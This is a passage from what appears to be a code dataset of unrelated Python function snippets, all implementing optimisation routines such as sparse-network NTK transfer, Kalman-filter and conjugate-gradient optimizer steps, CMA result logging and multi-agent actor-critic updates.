init_params=bounds[:,0]+(bounds[:,1]-bounds[:,0])*np.random.rand(len(bounds[:,0]))\n print(\"Iteration \"+str(i)+\" \",-res.fun)\n #params_best=res.x\n #optml=res.fun\n self.params=dic.inverse_transform(params_best,bounds)\n return -optml", "def minimize(self):\n pass", "def optimize(self, return_teacher_params_bool = False):\n\n gen_batches = self.DATASET.data_stream(self.BATCH_SIZE)\n \n num_complete_batches, leftover = divmod(self.DATASET.num_example['train'], self.BATCH_SIZE)\n\n # number of minibatches per epoch\n num_mini_batches_per_epochs = num_complete_batches + bool(leftover)\n\n # number of total iterations\n num_total_iters = self.NUM_EPOCHS * num_mini_batches_per_epochs\n\n # number of time that the sparisty levels get updated\n num_sparsity_updates = num_total_iters // self.MASK_UPDATE_FREQ \n \n mask_update_limit = num_total_iters - self.MASK_UPDATE_FREQ\n \n if self.SAVE_BOOL == True:\n # save the transferred results in the desinated directory.\n\n trans_model_dir = self.unique_model_dir\n\n# while os.path.exists(trans_model_dir):\n# trans_model_dir = trans_model_dir + '_0'\n \n if not os.path.exists(trans_model_dir):\n os.makedirs(trans_model_dir)\n\n np.save(trans_model_dir + '/param_dict.npy', self.param_dict) \n \n \n\n nt_trans_params_all_sparsities_all_runs = []\n nt_trans_masks_all_sparsities_all_runs = []\n nt_trans_vali_all_sparsities_all_runs = []\n teacher_params_all_sparsities_all_runs = []\n \n \n num_sparisty_levels = len(self.NN_DENSITY_LEVEL_LIST) \n num_runs = len(range(self.INIT_RUN_INDEX, self.INIT_RUN_INDEX + self.NUM_RUNS ))\n all_density_all_run_num_total_iters = num_sparisty_levels * num_runs * num_total_iters\n \n \n for nn_density_level in self.NN_DENSITY_LEVEL_LIST: \n \n \n nt_trans_params_all_runs = []\n nt_trans_masks_all_runs = []\n nt_trans_vali_all_runs = []\n teacher_params_all_runs = []\n\n\n for run_index in range(self.INIT_RUN_INDEX, self.INIT_RUN_INDEX + self.NUM_RUNS ):\n\n # do logging\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n # a string that summarizes the current ntt experiment\n model_summary_str = self.model_str + '_density_' + str(round(nn_density_level, 2) ) + '_run_' + str(run_index)\n\n if self.SAVE_BOOL == True:\n model_dir_density_run = trans_model_dir + '/' + 'density_' + str(round(nn_density_level, 2) ) + '/' + 'run_' + str(run_index) + '/'\n\n os.makedirs(model_dir_density_run)\n \n logging.basicConfig(filename = model_dir_density_run + \"/\" + model_summary_str + \"_log.log\", format='%(asctime)s %(message)s', filemode='w', level=logging.DEBUG)\n\n else: \n logging.basicConfig(filename = model_summary_str + \"_log.log\" , format='%(asctime)s %(message)s', filemode='w', level=logging.DEBUG)\n \n \n # for different run indices, randomly draw teacher net's parameters\n _, teacher_net_params = self.init_fun(random.PRNGKey(run_index), tuple(self.batch_input_shape))\n \n # the prediction of the teacher net evaluated on validation samples\n vali_teacher_prediction = self.apply_fn(teacher_net_params, self.vali_samples)\n\n vali_teacher_ntk_mat = self.emp_ntk_fn(self.vali_inputs_1, self.vali_inputs_2, teacher_net_params) \n\n # the initial binary mask\n \n if self.PRUNE_METHOD == 'magnitude': \n masks = get_masks_from_jax_params(teacher_net_params, nn_density_level, global_bool = self.GLOBAL_PRUNE_BOOL)\n elif self.PRUNE_METHOD == 'logit_snip':\n logger.info(\"Use logit snip method to get the initial mask\")\n num_examples_snip = 128\n\n# gen_batches_logit_snip = self.DATASET.data_stream(num_examples_snip)\n \n snip_input = self.DATASET.dataset['train']['input'][:num_examples_snip, :]\n \n if self.GLOBAL_PRUNE_BOOL == False:\n logger.warning(\"layerwise sparse net initialized with logit_snip\") \n masks = get_logit_snip_masks(teacher_net_params, nn_density_level, self.apply_fn, snip_input, self.batch_input_shape, GlOBAL_PRUNE_BOOL = self.GLOBAL_PRUNE_BOOL) \n else:\n raise NotImplementedError(\"not implemented\")\n \n\n # the initial student parameters\n masked_student_net_params = get_sparse_params_filtered_by_masks(teacher_net_params, masks)\n\n # instantiate the optimizer triple \n opt_init, opt_update, get_params = self.OPTIMIZER_WITH_PARAMS\n\n opt_state = opt_init(teacher_net_params) \n\n # one step of NTK transfer\n @jit\n def nt_transfer_step(i, opt_state, x, masks):\n\n # parameters in the current optimizer state\n student_net_params = get_params(opt_state)\n\n # gradients that flow through the binary masks\n masked_g = grad(self.nt_transfer_loss)(student_net_params, masks, teacher_net_params, x, nn_density_level)\n\n return opt_update(i, masked_g, opt_state)\n\n # a list of validation loss\n vali_loss_list = []\n\n # calculate the initial validation loss. \n vali_loss = self.eval_nt_transfer_loss_on_vali_data(masked_student_net_params, vali_teacher_prediction, vali_teacher_ntk_mat, nn_density_level)\n\n vali_loss_list.append(vali_loss)\n\n logger.info(\"Before transfer: trans dist %.3f | ntk dist %.3f | targ dist %.3f | l2 pentalty %.3f | nn density %.2f\", vali_loss[0], vali_loss[1], vali_loss[2], vali_loss[3], nn_density_level)\n itercount = itertools.count()\n\n t = time.time()\n\n # loop through iterations\n for num_iter in range(1, num_total_iters + 1): \n \n # a batch of input data\n batch_xs, _ = next(gen_batches) \n\n # reshape the input to a proper format (2d array for MLP and 3d for CNN)\n batch_xs = batch_xs.reshape(self.batch_input_shape) \n\n # update the optimizer state\n opt_state = nt_transfer_step(next(itercount), opt_state, batch_xs, masks )\n\n\n if num_iter % 100 == 0:\n elapsed_time = time.time() - t\n \n if (num_iter <= 500) and (run_index == self.INIT_RUN_INDEX) and (nn_density_level == self.NN_DENSITY_LEVEL_LIST[0]): \n # estimate the program end time.\n remaining_iter_num = all_density_all_run_num_total_iters - num_iter\n remaining_seconds = elapsed_time * ( remaining_iter_num / 100 )\n expected_end_time = str(datetime.now() + timedelta(seconds = remaining_seconds))\n\n # get parameters from the current optimizer state\n student_net_params = get_params(opt_state) \n\n # filter the paramters by masks\n masked_student_net_params = get_sparse_params_filtered_by_masks(student_net_params , masks)\n \n # validation loss\n vali_loss = self.eval_nt_transfer_loss_on_vali_data(masked_student_net_params, vali_teacher_prediction, vali_teacher_ntk_mat, nn_density_level) \n\n vali_loss_list.append(vali_loss)\n\n logger.info('run: %02d/%02d | iter %04d/%04d | trans. dist %.3f | ntk dist %.3f | targ. dist %.3f | l2 %.3f | nn density %.2f | time %.2f [s] | expected finish time %s', run_index, self.NUM_RUNS + self.INIT_RUN_INDEX - 1, num_iter, num_total_iters, vali_loss[0], vali_loss[1], vali_loss[2], vali_loss[3], nn_density_level, elapsed_time, expected_end_time)\n t = time.time()\n\n\n if (num_iter % self.MASK_UPDATE_FREQ == 0) and (num_iter < mask_update_limit):\n # get parameters from the current optimizer state\n student_net_params = get_params(opt_state) \n \n # update masks\n masks = get_masks_from_jax_params(student_net_params, nn_density_level, global_bool = self.GLOBAL_PRUNE_BOOL)\n \n# if self.PRUNE_METHOD == 'logit_snip':\n# logit_snip_batch_xs, _ = next(gen_batches_logit_snip)\n# masks = get_logit_snip_masks(student_net_params, nn_density_level, self.apply_fn, snip_input, self.batch_input_shape, GlOBAL_PRUNE_BOOL = self.GLOBAL_PRUNE_BOOL) \n# else:\n# masks = get_masks_from_jax_params(student_net_params, nn_density_level, global_bool = self.GLOBAL_PRUNE_BOOL)\n\n\n \n elapsed_time = time.time() - t\n \n student_net_params = get_params(opt_state) \n \n # filter the paramters by masks\n masked_student_net_params = get_sparse_params_filtered_by_masks(student_net_params , masks)\n \n vali_loss = self.eval_nt_transfer_loss_on_vali_data(masked_student_net_params, vali_teacher_prediction, vali_teacher_ntk_mat, nn_density_level) \n\n vali_loss_list.append(vali_loss)\n \n logger.info('run: %02d/%02d | iter %04d/%04d | trans. dist %.3f | ntk dist %.3f | targ. dist %.3f | l2 %.3f | nn density %.2f | time %.2f [s]', run_index, self.NUM_RUNS + self.INIT_RUN_INDEX - 1, num_iter, num_total_iters, vali_loss[0], vali_loss[1], vali_loss[2], vali_loss[3], nn_density_level, elapsed_time )\n \n vali_loss_array = np.array(vali_loss_list)\n\n nt_trans_params_all_runs.append(masked_student_net_params)\n nt_trans_masks_all_runs.append(masks)\n nt_trans_vali_all_runs.append(vali_loss_array)\n teacher_params_all_runs.append(teacher_net_params )\n\n if self.SAVE_BOOL == True:\n\n model_summary_str = self.model_str + '_density_' + str(round(nn_density_level, 2) ) + '_run_' + str(run_index)\n\n teacher_param_fileName = model_dir_density_run + 'teacher_params_' + model_summary_str\n np.save(teacher_param_fileName, teacher_net_params)\n\n student_param_fileName = model_dir_density_run + 'transferred_params_' + model_summary_str\n np.save(student_param_fileName, masked_student_net_params)\n\n mask_fileName = model_dir_density_run + 'transferred_masks_' + model_summary_str\n np.save(mask_fileName, masks)\n\n loss_array_fileName = model_dir_density_run + 'loss_array_' + model_summary_str\n np.save(loss_array_fileName, vali_loss_array)\n \n\n nt_trans_params_all_sparsities_all_runs.append( nt_trans_params_all_runs )\n nt_trans_masks_all_sparsities_all_runs.append( nt_trans_masks_all_runs )\n nt_trans_vali_all_sparsities_all_runs.append( nt_trans_vali_all_runs )\n teacher_params_all_sparsities_all_runs.append( teacher_params_all_runs )\n \n if return_teacher_params_bool:\n return nt_trans_params_all_sparsities_all_runs, nt_trans_masks_all_sparsities_all_runs, nt_trans_vali_all_sparsities_all_runs, teacher_params_all_sparsities_all_runs\n\n else:\n return nt_trans_params_all_sparsities_all_runs, nt_trans_masks_all_sparsities_all_runs, nt_trans_vali_all_sparsities_all_runs", "def step(self, closure=None):\n loss = None\n if closure is not None:\n loss = closure()\n for m in self.optimizers:\n m.step()\n return loss", "def ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(current_global_index,pickled_coarse_model,pickled_coarse_project_parameters,pickled_custom_metric_refinement_parameters,pickled_custom_remesh_refinement_parameters,random_variable,current_index,current_analysis_stage,previous_computational_time,open_mp_threads,mapping_flag,pickled_mapping_reference_model,print_to_file,filename):\n\n start_time = time.time()\n # unpickle model and build Kratos Model object\n serialized_model = pickle.loads(pickled_coarse_model)\n current_model = KratosMultiphysics.Model()\n serialized_model.Load(\"ModelSerialization\",current_model)\n del(serialized_model)\n # unpickle parameters and build Kratos Parameters object\n serialized_project_parameters = pickle.loads(pickled_coarse_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n # refine if current current_global_index > 0, adaptive refinement based on the solution of previous index\n if (current_index > 0):\n # unpickle metric and remesh refinement parameters and build Kratos Parameters objects\n serialized_custom_metric_refinement_parameters = pickle.loads(pickled_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters = pickle.loads(pickled_custom_remesh_refinement_parameters)\n current_custom_metric_refinement_parameters = KratosMultiphysics.Parameters()\n current_custom_remesh_refinement_parameters = KratosMultiphysics.Parameters()\n serialized_custom_metric_refinement_parameters.Load(\"MetricRefinementParametersSerialization\",current_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters.Load(\"RemeshRefinementParametersSerialization\",current_custom_remesh_refinement_parameters)\n del(serialized_custom_metric_refinement_parameters,serialized_custom_remesh_refinement_parameters)\n # refine the model Kratos object\n adaptive_refinement_manager = AdaptiveRefinement(current_index,current_model,current_project_parameters,current_custom_metric_refinement_parameters,current_custom_remesh_refinement_parameters)\n refined_model,refined_project_parameters = adaptive_refinement_manager.ComputeAdaptiveRefinement()\n current_model = refined_model\n del(refined_model,refined_project_parameters)\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index\n if (current_index == current_global_index):\n simulation.is_current_index_maximum_index = True\n else:\n simulation.is_current_index_maximum_index = False\n # mapping if in current finest level and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True and current_index == current_global_index):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True and current_index == current_global_index):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n # save model and parameters as MpiSerializer Kratos objects\n serialized_finer_model = KratosMultiphysics.MpiSerializer()\n serialized_finer_model.Save(\"ModelSerialization\",simulation.model)\n # pickle model and parameters\n pickled_finer_model = pickle.dumps(serialized_finer_model, 2) # second argument is the protocol and is NECESSARY (according to pybind11 docs)\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,pickled_finer_model,computational_time", "def step(self, closure):\r\n self.state['step'] += 1\r\n for y_ind in range(self.dim_out):\r\n err = closure(y_ind)\r\n for group_ind in range(len(self.param_groups)):\r\n group = self.param_groups[group_ind]\r\n iekf_mat = self.state['iekf_groups'][group_ind]\r\n for ii, w in enumerate(group['params']):\r\n if w.grad is None:\r\n continue\r\n H_n = iekf_mat[ii]['H']\r\n grad = w.grad.data.detach()\r\n if len(w.size()) > 1:\r\n grad = grad.transpose(1, 0)\r\n grad = grad.contiguous().view((1, -1))\r\n if y_ind == 0:\r\n H_n = grad\r\n else:\r\n H_n = torch.cat([H_n, grad], dim=0)\r\n self.state['iekf_groups'][group_ind][ii]['H'] = H_n\r\n\r\n err_T = err.transpose(0, 1)\r\n\r\n for group_ind in range(len(self.param_groups)):\r\n group = self.param_groups[group_ind]\r\n iekf_mat = self.state['iekf_groups'][group_ind]\r\n for ii, w in enumerate(group['params']):\r\n if w.grad is None:\r\n continue\r\n\r\n lbd_n = iekf_mat[ii]['lbd']\r\n P_n = iekf_mat[ii]['P']\r\n EPS = iekf_mat[ii]['EPS']\r\n H_n = iekf_mat[ii]['H']\r\n H_n_T = H_n.transpose(0, 1)\r\n if group['lbd_decay']:\r\n miu = 1.0 / min(self.state['step'], group['lbd_max_step'])\r\n lbd_n = lbd_n + miu * (err_T.mm(err).flatten()[0] / self.dim_out - lbd_n)\r\n self.state['iekf_groups'][group_ind][ii]['lbd'] = lbd_n\r\n R_n = lbd_n * torch.eye(self.dim_out, dtype=torch.float, device=iekf_mat[ii]['device'],\r\n requires_grad=False)\r\n\r\n g_n = R_n + H_n.mm(P_n).mm(H_n_T)\r\n g_n = g_n.inverse()\r\n\r\n K_n = P_n.mm(H_n_T).mm(g_n)\r\n delta_w = K_n.mm(err)\r\n if len(w.size()) > 1:\r\n delta_w = delta_w.view((w.size(1), w.size(0))).transpose(1, 0)\r\n else:\r\n delta_w = delta_w.view(w.size())\r\n\r\n new_P = (group['alpha'] + 1) * (P_n - K_n.mm(H_n).mm(P_n) + EPS)\r\n self.state['iekf_groups'][group_ind][ii]['P'] = new_P\r\n\r\n w.data.add_(delta_w)\r\n\r\n return err", "def optimize_library_descent(self, target, direction='max', steps=100,\n multiprocessing=False, ret_info=False,\n args=None):\n # get the target function to call\n target_function = getattr(self, target)\n if args is not None:\n target_function = functools.partial(target_function, **args)\n\n # initialize the optimizer\n value = target_function()\n value_best, state_best = value, self.sens_mat.copy()\n \n if ret_info:\n # store extra information\n start_time = time.time()\n info = {'values': {}}\n values_count = self.parameters['optimizer_values_count']\n values_step = max(1, steps // values_count)\n \n if multiprocessing:\n # run the calculations in multiple processes\n pool_size = self.get_number_of_cores()\n pool = mp.Pool(processes=pool_size)\n if ret_info:\n values_step = max(1, values_step // pool_size)\n \n # iterate for given number of steps\n for step in range(int(steps) // pool_size):\n joblist = []\n init_arguments = self.init_arguments\n for _ in range(pool_size):\n # modify the current state and add it to the job list\n i = random.randrange(self.sens_mat.size)\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n params = init_arguments['parameters'] \n params['sensitivity_matrix'] = self.sens_mat\n params['initialize_state']['sensitivity'] = 'exact'\n \n joblist.append((copy.deepcopy(init_arguments), target))\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n \n # run all the jobs\n results = pool.map(_run_job, joblist)\n \n # find the best result \n if direction == 'max':\n res_best = np.argmax(results)\n if results[res_best] > value_best:\n value_best = results[res_best]\n state_best = joblist[res_best][0]['parameters']['sensitivity_matrix']\n # use the best state as a basis for the next iteration\n self.sens_mat = state_best\n \n elif direction == 'min':\n res_best = np.argmin(results)\n if results[res_best] < value_best:\n value_best = results[res_best]\n state_best = joblist[res_best][0]['parameters']['sensitivity_matrix']\n # use the best state as a basis for the next iteration\n self.sens_mat = state_best\n \n else:\n raise ValueError('Unsupported direction `%s`' % direction)\n \n if ret_info and step % values_step == 0:\n info['values'][step * pool_size] = results[res_best]\n \n else:\n # run the calculations in this process\n for step in range(int(steps)):\n # modify the current state\n i = random.randrange(self.sens_mat.size)\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n \n # get the value of the new state\n value = target_function()\n \n improved = ((direction == 'max' and value > value_best) or\n (direction == 'min' and value < value_best))\n if improved:\n # save the state as the new best value\n value_best, state_best = value, self.sens_mat.copy()\n else:\n # undo last change\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n \n if ret_info and step % values_step == 0:\n info['values'][step] = value_best\n\n # sort the best state and store it in the current object\n state_best = self.sort_sensitivity_matrix(state_best)\n self.sens_mat = state_best.copy()\n\n if ret_info:\n info['total_time'] = time.time() - start_time \n info['states_considered'] = steps\n info['performance'] = steps / info['total_time']\n return value_best, state_best, info\n else:\n return value_best, state_best", "def post_apply(self): #pragma no cover\n for e in self.obs_queue:\n\n # translate operation wire labels to the device's wire labels\n device_wires = self.map_wires(e.wires)\n\n self.measure += \"set resultArray w/= {wires[0]} <- \".format(wires=device_wires.tolist())\n self.measure += self._observable_map[e.name].format(wires=device_wires.tolist())\n self.measure += \" \"\n\n self._source_code = PROGRAM.format(wires=self.num_wires, operations=self.prog, measurements=self.measure)\n self.qs = qsharp.compile(self._source_code)", "def optimize(self, input_val_dict):\n logger.log(\"Start CG optimization\")\n\n logger.log(\"computing loss before\")\n loss_before = self.loss(input_val_dict)\n\n logger.log(\"performing update\")\n\n logger.log(\"computing gradient\")\n gradient = self.gradient(input_val_dict)\n logger.log(\"gradient computed\")\n\n logger.log(\"computing descent direction\")\n Hx = self._hvp_approach.build_eval(input_val_dict)\n descent_direction = conjugate_gradients(Hx, gradient, cg_iters=self._cg_iters)\n\n initial_step_size = np.sqrt(2.0 * self._max_constraint_val *\n (1. / (descent_direction.dot(Hx(descent_direction)) + 1e-8)))\n if np.isnan(initial_step_size):\n logger.log(\"Initial step size is NaN! Rejecting the step!\")\n return\n\n initial_descent_step = initial_step_size * descent_direction\n logger.log(\"descent direction computed\")\n\n prev_params = self._target.get_param_values()\n prev_params_values = _flatten_params(prev_params)\n\n loss, constraint_val, n_iter, violated = 0, 0, 0, False\n for n_iter, ratio in enumerate(self._backtrack_ratio ** np.arange(self._max_backtracks)):\n cur_step = ratio * initial_descent_step\n cur_params_values = prev_params_values - cur_step\n cur_params = _unflatten_params(cur_params_values, params_example=prev_params)\n self._target.set_params(cur_params)\n\n loss, constraint_val = self.loss(input_val_dict), self.constraint_val(input_val_dict)\n if loss < loss_before and constraint_val <= self._max_constraint_val:\n break\n\n \"\"\" ------------------- Logging Stuff -------------------------- \"\"\"\n if np.isnan(loss):\n violated = True\n logger.log(\"Line search violated because loss is NaN\")\n if np.isnan(constraint_val):\n violated = True\n logger.log(\"Line search violated because constraint %s is NaN\" % self._constraint_name)\n if loss >= loss_before:\n violated = True\n logger.log(\"Line search violated because loss not improving\")\n if constraint_val >= self._max_constraint_val:\n violated = True\n logger.log(\"Line search violated because constraint %s is violated\" % self._constraint_name)\n\n if violated and not self._accept_violation:\n logger.log(\"Line search condition violated. Rejecting the step!\")\n self._target.set_params(prev_params)\n\n logger.log(\"backtrack iters: %d\" % n_iter)\n logger.log(\"computing loss after\")\n logger.log(\"optimization finished\")", "def optimize5():\n xl = xl_app()\n qt_app = get_qt_app() # pragma noqc\n # Get the initial values of the input cells\n msgBox = OpDialog()\n result = msgBox.exec_()\n if not result: # user cancelled\n return\n\n in_range = get_range(msgBox.in_range.text())\n out_cell = get_range(msgBox.out_cell.text())\n in_values = list(in_range.Value)\n X = np.array([x[0] for x in in_values])\n\n orig_calc_mode = xl.Calculation\n try:\n # switch Excel to manual calculation\n # and disable screen updating\n xl.Calculation = constants.xlManual\n xl.ScreenUpdating = False\n\n # run the minimization routine\n xl_obj_func = partial(obj_func, xl, in_range, out_cell)\n print(f\"X = {X}\")\n result = minimize(xl_obj_func, X, method=\"nelder-mead\")\n in_range.Value = [(float(x),) for x in result.x]\n xl.ScreenUpdating = True\n mbox = QMessageBox()\n mbox.setIcon(QMessageBox.Information)\n mbox.setText(\"Optimization results shown below.\" \"\\nMake changes permanent?\")\n mbox.setWindowTitle(\"Optimization Complete\")\n mbox.setInformativeText(\n \"\\n\".join(\n [\n \"Successful: %s\" % result.success,\n result.message,\n \"After %d iterations\" % result.nit,\n ]\n )\n )\n mbox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n yes_no = mbox.exec_()\n if yes_no != QMessageBox.Ok:\n in_range.Value = in_values\n else:\n in_range.Value = [(float(x),) for x in result.x]\n\n finally:\n # restore the original calculation\n # and screen updating mode\n xl.ScreenUpdating = True\n xl.Calculation = orig_calc_mode", "def finalize(self):\n self.report('Finalizing optimization procedure.')\n with self.optimizer() as opt:\n optimal_process_output = opt.result_value\n optimal_process_output.store()\n self.out('optimal_process_output', optimal_process_output)\n result_index = opt.result_index\n optimal_process = self.ctx[self.eval_key(result_index)]\n self.out('optimal_process_uuid', Str(optimal_process.uuid).store())", "def _optimize(self) -> None:\n\n for i, agent in enumerate(self.agents):\n states, actions, rewards, next_states, dones = self.memory.sample()\n\n actor_next_state = self._agent_states(i, next_states)\n next_actions = torch.cat(\n [a.actor_target(actor_next_state) for a in self.agents], 1\n )\n next_q = agent.critic_target(next_states, next_actions).detach()\n target_q = rewards[:, i].view(-1, 1) + self.gamma * next_q * (\n 1 - dones[:, i].view(-1, 1)\n )\n local_q = agent.critic_local(states, actions)\n\n value_loss = agent.loss_fn(local_q, target_q)\n agent.value_optimizer.zero_grad()\n value_loss.backward()\n agent.value_optimizer.step()\n\n local_actions = []\n for i, a in enumerate(self.agents):\n local_states = self._agent_states(i, states)\n local_actions.append(\n a.actor_local(local_states)\n if a == agent\n else a.actor_local(local_states).detach()\n )\n local_actions = torch.cat(local_actions, 1)\n policy_loss = -agent.critic_local(states, local_actions).mean()\n\n agent.policy_optimizer.zero_grad()\n policy_loss.backward()\n agent.policy_optimizer.step()\n\n self._update_target_model(agent.critic_local, agent.critic_target)\n self._update_target_model(agent.actor_local, agent.actor_target)", "def main_function(self):\n self.ana_cont_probl = cont.AnalyticContinuationProblem(im_axis=self.input_data.mats,\n im_data=self.input_data.value.real,\n re_axis=self.realgrid.grid,\n kernel_mode='freq_bosonic')\n model = np.ones_like(self.realgrid.grid)\n model /= np.trapz(model, self.realgrid.grid)\n\n preblur, bw = self.get_preblur()\n\n sol = self.ana_cont_probl.solve(method='maxent_svd',\n optimizer='newton',\n alpha_determination='chi2kink',\n model=model,\n stdev=self.input_data.error,\n interactive=False, alpha_start=1e10, alpha_end=1e-3,\n preblur=preblur, blur_width=bw)\n\n inp_str = 'atom {}, orb {}, spin {}, blur {}: '.format(self.input_data.atom,\n self.input_data.orbital,\n self.input_data.spin,\n bw)\n all_chis = np.isfinite(np.array([s.chi2 for s in sol[1]]))\n res_str = 'alpha_opt={:3.2f}, chi2(alpha_opt)={:3.2f}, min(chi2)={:3.2f}'.format(\n sol[0].alpha, sol[0].chi2, np.amin(all_chis)\n )\n self.text_output.append(inp_str + res_str)\n alphas = [s.alpha for s in sol[1]]\n chis = [s.chi2 for s in sol[1]]\n\n self.output_data.update(self.realgrid.grid, sol[0].A_opt, self.input_data)\n\n fig, ax = plt.subplots(ncols=2, nrows=2, figsize=(11.75, 8.25)) # A4 paper size\n ax[0, 0].loglog(alphas, chis, marker='s', color='black')\n ax[0, 0].loglog(sol[0].alpha, sol[0].chi2, marker='*', color='red', markersize=15)\n ax[0, 0].set_xlabel(r'$\\alpha$')\n ax[0, 0].set_ylabel(r'$\\chi^2(\\alpha)$')\n\n ax[1, 0].plot(self.realgrid.grid, sol[0].A_opt)\n ax[1, 0].set_xlabel(r'$\\omega$')\n ax[1, 0].set_ylabel('spectrum')\n\n ax[0, 1].plot(self.input_data.mats, self.input_data.value.real,\n color='blue', ls=':', marker='x', markersize=5,\n label='Re[data]')\n ax[0, 1].plot(self.input_data.mats, self.input_data.value.imag,\n color='green', ls=':', marker='+', markersize=5,\n label='Im[data]')\n ax[0, 1].plot(self.input_data.mats, sol[0].backtransform.real,\n ls='--', color='gray', label='Re[fit]')\n ax[0, 1].plot(self.input_data.mats, sol[0].backtransform.imag,\n color='gray', label='Im[fit]')\n ax[0, 1].set_xlabel(r'$\\nu_n$')\n ax[0, 1].set_ylabel(self.input_data.data_type)\n ax[0, 1].legend()\n\n ax[1, 1].plot(self.input_data.mats, (self.input_data.value - sol[0].backtransform).real,\n ls='--', label='real part')\n ax[1, 1].plot(self.input_data.mats, (self.input_data.value - sol[0].backtransform).imag,\n label='imaginary part')\n ax[1, 1].set_xlabel(r'$\\nu_n$')\n ax[1, 1].set_ylabel('data $-$ fit')\n ax[1, 1].legend()\n plt.tight_layout()\n plt.show()", "def callback(_locals, _globals):\n global n_steps\n # Print stats every 20 calls\n if (n_steps + 1) % 1 == 0:\n # Evaluate policy training performance\n episode_rewards, episode_lengths = evaluate_policy(_locals['self'], eval_real_env,\n n_eval_episodes=n_eval_episodes,\n render=False,\n deterministic=False,\n return_episode_rewards=False)\n print(\"Last mean reward per episode at target: {:.2f}\".format(episode_rewards))\n\n episode_rewards_grnd, episode_lengths_grnd = evaluate_policy(_locals['self'], eval_grnd_env,\n n_eval_episodes=n_eval_episodes,\n render=False,\n deterministic=False,\n return_episode_rewards=False)\n print(\"Last mean reward per episode at grounded environment: {:.2f}\".format(episode_rewards_grnd))\n\n with open(os.path.join(log_dir, 'eval_at_target.txt'), 'a') as f:\n f.write(\"{}, {}, {}\\n\".format(n_steps, episode_rewards, episode_lengths/n_eval_episodes))\n f.close()\n with open(os.path.join(log_dir, 'eval_at_grnd.txt'), 'a') as f:\n f.write(\"{}, {}, {}\\n\".format(n_steps, episode_rewards_grnd, episode_lengths_grnd/n_eval_episodes))\n f.close()\n n_steps += 1\n return True", "def run(self):\n i = 0\n try:\n for i in range(0, self._iters):\n if self._verbose:\n print(\" Inner CG Iteration \" + repr(i))\n\n self._forward(self._p_k, self._v_k)\n sigma_k = measure(self._p_k, self._v_k)\n alpha_k = self._rho_k / sigma_k\n update_m(self._m, alpha_k, self._p_k)\n sub_scaled_vector(self._residual_k, self._residual_k, alpha_k,\n self._v_k)\n self._v_k = gpuarray_copy(self._residual_k)\n rho_k_plus_1 = measure(self._v_k, self._residual_k)\n rho_k_t = np.abs(rho_k_plus_1)\n\n if (rho_k_t / self._rho_0 <= self._relative_tolerance) \\\n or (rho_k_t <= self._absolute_tolerance):\n if self._verbose:\n print(\"Converged at Iteration \" + str(i) + \".\")\n self.converged = True\n self.iteration = i+1\n return\n\n add_scaled_vector(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k,\n self._p_k)\n self._rho_k = rho_k_plus_1\n\n if self._verbose >= 3:\n print(\" Residual=\" + repr(rho_k_t))\n except KeyboardInterrupt:\n raise\n finally:\n self.iteration = i+1", "def save_cma_optimization_results(self, es):\n # code extra verbose to understand what is going on\n generation = es.result.iterations\n evals = es.result.evaluations # number of evals at start of each gen\n xfavorite = es.result.xfavorite # center of distribution, best est\n stds = es.result.stds # stds of distribution, stds of xfavorite\n fbest = es.result.fbest # best ever measured\n xbest = es.result.xbest # coordinates of best ever measured\n evals_best = es.result.evals_best # index of best measurement\n\n if not self.minimize_optimization:\n fbest = -fbest\n\n results_array = np.concatenate([[generation, evals],\n xfavorite, stds,\n [fbest], xbest, [evals_best]])\n if (not 'optimization_result'\n in self.data_object[EXPERIMENTAL_DATA_GROUP_NAME].keys()):\n opt_res_grp = self.data_object[EXPERIMENTAL_DATA_GROUP_NAME]\n self.opt_res_dset = opt_res_grp.create_dataset(\n 'optimization_result', (0, len(results_array)),\n maxshape=(None, len(results_array)),\n dtype='float64')\n\n # FIXME: Jan 2018, add the names of the parameters to column names\n self.opt_res_dset.attrs['column_names'] = h5d.encode_to_utf8(\n 'generation, ' + 'evaluations, ' +\n 'xfavorite, ' * len(xfavorite) +\n 'stds, '*len(stds) +\n 'fbest, ' + 'xbest, '*len(xbest) +\n 'best evaluation,')\n\n old_shape = self.opt_res_dset.shape\n new_shape = (old_shape[0]+1, old_shape[1])\n self.opt_res_dset.resize(new_shape)\n self.opt_res_dset[-1, :] = results_array", "def run(self):\n self._fitness = self._fitness_func(self._bitstring, *self._args, **self._kwargs)", "def Optimize(fun, \n dimensions = 10,\n dataType = float64,\n lowerDomain = -5.0,\n upperDomain = 5.0,\n constrainToLower = False,\n constrainToUpper = False,\n maxMutations = 3, \n maxIndexes = 3, \n gamma = 0.99, \n minImprovements = 3,\n scale = 1.0,\n popSize = 10, \n maxIterations = 1000000,\n targetLoss = 1.0e-8,\n minScale = 1.0e-10):\n pop = Population( memberLength = dimensions,\n memberDataType = dataType,\n lowerDomain = lowerDomain, \n upperDomain = upperDomain,\n maxMutations = maxMutations, \n maxIndexes = maxIndexes, \n gamma = gamma, \n minImprovements = minImprovements,\n scale = scale)\n 